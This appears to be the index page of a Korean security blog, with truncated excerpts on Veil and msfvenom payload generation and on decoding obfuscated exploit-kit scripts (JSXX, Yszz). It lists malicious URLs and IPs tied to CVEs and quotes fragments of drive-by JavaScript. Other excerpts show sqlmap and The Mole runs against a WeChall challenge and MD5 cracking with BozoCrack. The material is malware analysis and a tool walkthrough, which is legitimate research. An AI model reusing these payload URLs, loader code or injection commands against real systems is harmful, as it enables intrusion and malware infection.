Veil를 언젠가 유용하게 쓸일이 있을거 같아 기록해 둔다. Veil는 https://github.com/veil-evasion/Veil 에서 다운로드 받는다. Metasploit 역시 http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2 를 다운로드 한다. Metasploit은 /home/tester/msf3 에 Veil는 /home/tester/Veil-master 에 설치했다고 가정하고 진행한다. tester@ubuntu:~$ sudo ln -s /home/tester/msf3/msfvenom /usr/bin/msfvenom tester@ubuntu:~$ cd Veil-master tester@ubuntu:~/Veil-master$ ./Veil.py ========================================================================= Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013 ========================================================================= [?] What payload type would you like …
GnuPG를 php에서 사용 시
GnuPG를 php에서 사용 시 설치해야 할 패키지 입니다. 테스트는 Ubuntu 13.04 에서 실시하였습니다. 먼저 Apache와 php를 설치합니다. 그리고 GnuPG 관련 패키지를 설치합니다. jjoon@ubuntu:~$ sudo apt-get install apache2 php5-dev php5 jjoon@ubuntu:~$ sudo apt-get install gnupg libgpgme11-dev libgpg-error-dev libassuan-dev 다음 pecl을 통해 php 확장 모듈을 설치합니다. 쉽게 "sudo pecl install gnupg" 하면 되겠지만 해보시면 아시겠지만 에러가 납니다. …
JSXX 0.44 VIP
최근 경향은 대부분 자바 취약점이네요. 간단하게 한번 디코딩 하여 살펴보았습니다. http://5b8.co/m L http://5b8.co/m/index.html L http://5b8.co/m/swfobject.js L http://5b8.co/m/jpg.js L http://5b8.co/m/jvTDIYE7.html L http://5b8.co/m/GAHNr0.html 원본 코드는 아래와 같습니다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> var YdgJw3=navigator.userAgent.toLowerCase(); var SPRB3="1"+"1"+"1"; if(document.cookie.indexOf("xcDHL4=")==-1 && YdgJw3.indexOf("linux")<=-1 && YdgJw3.indexOf("bot")==-1 && YdgJw3.indexOf("spider")==-1) { var pxtXtt1=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); SPRB3="0"; document.cookie="xcDHL4=Yes;path=/;expires="+expires.toGMTString(); FTYdkdd0="1";delete FTYdkdd0;try{FTYdkdd0+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";}catch(e){var Huaqmm1="1";XtpkDF6 …
Yszz 1.5 vip 관련 코드 확인
오랜만에 보여서 한번 살펴봤는데 예전과 많이 달라져서 기록해 둔다. http://festival.cocobau.com/adm_site/e_show/e_th_ad.js L http://205.164.25.148/pic/img.js L http://205.164.25.148/pic/img.html L http://205.164.25.148/pic/XLL0zxmA.jpg (CVE?) L http://205.164.25.148/pic/rKQeVOG.jpg (CVE-2011-3544) L http://205.164.25.148/pic/9O4v7e.html (CVE-2011-1255) L http://205.164.25.148/pic/yNDGhP.js L http://205.164.25.148/pic/bmrYt.html (CVE-2012-1889) L http://205.164.25.148/pic/swfobject.js L http://205.164.25.148/pic/jpg.js L http://205.164.25.148/pic/css.html img.html 파일을 디코딩 해보도록 하자. "Yszz 1.5 vip" 라는 주석이 들어가는게 특징으로 보인다. <script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script language =javascript> …
sqlmap – automatic SQL injection and database takeover tool
sqlmap 이란 툴이 트위터랑 페이스북에서 계속 언급되어 어떤것인가 하고 찾아서 사용해 봤습니다. 이것도 굉장한 자동화 도구네요. 아래는 간단하게 테스트 한 내용 입니다. sqlmap : http://sqlmap.sourceforge.net/ 메뉴얼 : http://sqlmap.sourceforge.net/doc/README.html GUI for sqlmap (Linux) : http://code.google.com/p/gui-for-sqlmap/ GUI for sqlmap (Windows) : http://sourceforge.net/projects/sqlmapwin/ 1. Database명 알아내기 [byjjoon@localhost sqlmap]$ ./sqlmap.py -u "http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login" –dbs sqlmap/0.9 – automatic SQL injection and …
또 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2012-0754)
국내에서 전파되는 온라인게임핵 악성코드 전파용 취약점이 또 하나가 새롭게 추가가 되었습니다. CVE-2012-0754 : http://www.exploit-db.com/exploits/18572/ Exploit-DB 사이트에 올라오자 마자 바로 자기네들에 맞게 수정하여 전파하네요. 아래는 이번에 국내에서 발견된 해당 취약점과 관련된 SWF 파일 내부에 작성되어 있는 액션 스크립트 입니다. 이전에 발견된 CVE-2011-2140 취약점과 아주 유사하게 구성되어 있으며 취약점과 관련된 MP4 파일명도 CVE-2011-2140 취약점은 ea.jpg 그리고 이번에 …
새로운 난독화 해제 방법 (Encrypt By Dadong’s JSXX 0.41 VIP)
Encrypt By Dadong blahblah 라고 주석을 남기던 난독화 코드가 버전업을 했습니다. 이제는 아래와 같은 주석을 남기네요. Encrypt By www.krmeok.com's JSXX 0.41 VIP Encrypt By 도메인명's JSXX 0.41 VIP 아마도 "Encrypt By Dadong" 이라는 문자열로 시그니처를 만들기 시작해서 그것을 회피하고자 바꾼 것으로 추측됩니다. 추가로 디코딩 방법은 0.41로 버전업 하기 전과 동일한 방법으로 풀리며, 디코딩 하는 새로운 …
BozoCrack – MD5 Crack
MD5 Hash를 꺠는데 구글을 이용하여 레인보우 테이블이나 브루트포스 공격보다 더 빠르게 찾을 수 있는 BozoCrack 이란게 있다고 하여 간단하게 테스트를 해보았습니다. [root@localhost byjjoon]# cat test.txt 098f6bcd4621d373cade4e832627b4f6 755f85c2723bb39381c7379a604160d8 f6182f0359f72aae12fb90d305ccf9eb eb938c5aa46863c29e86c64a2c2ed60c [root@localhost byjjoon]# ruby bozocrack.rb Usage example: ruby bozocrack.rb file_with_md5_hashes.txt [root@localhost byjjoon]# ruby bozocrack.rb test.txt Loaded 4 unique hashes 098f6bcd4621d373cade4e832627b4f6:test 755f85c2723bb39381c7379a604160d8:good f6182f0359f72aae12fb90d305ccf9eb:young eb938c5aa46863c29e86c64a2c2ed60c:pyj 꽤 빠르게 뽑아주네요 다운로드는 …
The Mole
SQL Injection 관련 툴이 있어 간단한 사용기를 작성합니다. The Mole (Digging up your data) : http://themole.nasel.com.ar/ 문제는 WeChall의 Table 이름을 찾는 문제를 대상으로 해당 툴을 이용해 풀이를 해보도록 하겠습니다. 실행 후 Tab 키를 누르면 여러 옵션을 설정할 수 있음을 알 수 있습니다. 옵션이 다양해서 아주 범용적으로 사용할 수 있을거 같네요. C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe _____ _ ___ ___ …
새롭게 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2011-3544)
최근 국내에서 전파되는 온라인게임핵 악성코드와 관련하여 추가된 취약점이 있어 공유합니다. http://www.yo****ow.com/63/pps.html L http://www.yo****ow.com/63/jpg.js 이번주부터 추가되어 전파되는 것으로 보이며, CVE-2011-3544 (Oracle Java Applet Rhino Script Engine Remote Code Execution) 취약점으로 Oracle Java SE JDK and JRE 7 and 6 Update 27 이전 버전이면 감염이 됩니다. http://www.yo****ow.com/63/pps.html 코드를 살펴보면 이전과는 다른점을 확인할 수 있습니다. <script src=jpg.js></script> <script> …